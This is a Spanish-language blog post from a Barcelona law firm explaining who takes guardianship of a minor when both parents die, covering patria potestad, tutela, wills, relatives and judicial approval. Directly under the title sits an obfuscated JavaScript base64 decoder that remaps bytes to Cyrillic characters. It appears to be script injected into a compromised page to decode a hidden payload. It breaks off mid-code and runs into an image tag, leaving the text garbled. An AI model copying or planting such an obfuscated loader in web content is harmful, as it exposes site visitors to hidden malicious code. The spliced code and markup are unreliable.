¿Quién asume la tutela cuando los padres mueren?

function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfando-padres-mueren.jpg” alt=”quien-asume-tutela-cuando-padres-mueren" width="500" height="344" />

Una duda que recibe el despacho de abogados en Barcelona es si un infante queda huérfano, quién asume la tutela cuando los padres mueren. Uno de los casos más delicados en derecho civil es cuando un menor pierde a ambos padres por cualquier motivo: accidente, enfermedad, problemas legales, etc.

La patria potestad y la tutela

Los padres son la seguridad de los pequeños. Pero, si mamá y papá fallecen al mismo tiempo, o uno muere primero y el otro luego cuando el niño es aún menor. Si bien esto no es común, sí que sucede. Hay un problema legal que debe resolverse.

Antes de continuar, aclaremos un par de conceptos y lo que dice nuestro código civil al respecto.

  • Patria potestad: Se entiende por patria potestad los deberes y derechos innatos que tienen los padres sobre sus hijos no emancipados o con alguna discapacidad. Con el fin de salvaguardar su educación y crecimiento.
  • Tutela: La tutela es la responsabilidad adquirida de una institución o persona natural de administrar los bienes de otra persona y velar por su bienestar. Siempre y cuando esa persona carezca de patria potestad, no esté emancipada o esté incapacitada para asumir la mayordomía de su patrimonio.

En el libro I del Código Civil de España, se aclara, entre otras cosas, que:

  1. “Los hijos no emancipados están bajo la patria potestad de los padres.”
  2. La patria potestad será ejercida siempre a favor del menor.
  3. Ambos padres asumirán por igual este derecho, a no ser que uno le haya cedido totalmente esta responsabilidad al otro, de forma tácita o explícita.
  4. Uno de los motivos por los que se extingue la patria potestad es por fallecimiento de uno o ambos padres.

¿Quién asume la tutela cuando los padres mueren?

Hay padres precavidos que redactan un testamento para asegurar el bienestar de sus hijos, en caso de un infortunio. De ser así, solo hay que consultar lo establecido en este y conocer quién se hará cargo del o los menores.

Sin embargo, la mayoría de los casos se dan imprevistos. De ser así, el código civil español contempla que si un menor de edad está desamparado, la entidad pública competente de esa localidad tiene el derecho de asumir la tutela.

Por lo general, algún familiar cercano suele tomar la tutela del menor. Los abuelos, tíos o primos son los familiares que más revelan su buena voluntad de cuidar del pequeño. De no haber alguien de la familia, entonces, el cuidado del pequeño quedará a la orden de algún conocido o de la entidad pública local.

De cualquier manera se le notificará al juez encargado del caso, quien  aprobará o no la tutela (depende si la persona es capaz de atender al menor) y asignará a un segundo tutor, por si el primero se determina incapaz.

Ya sabes quién asume la tutela cuando los padres mueren. Si quieres asegurar la estabilidad emocional y material de tus hijos, ponte en contacto con nosotros. Te asesoraremos legalmente, para que tomes la mejor decisión.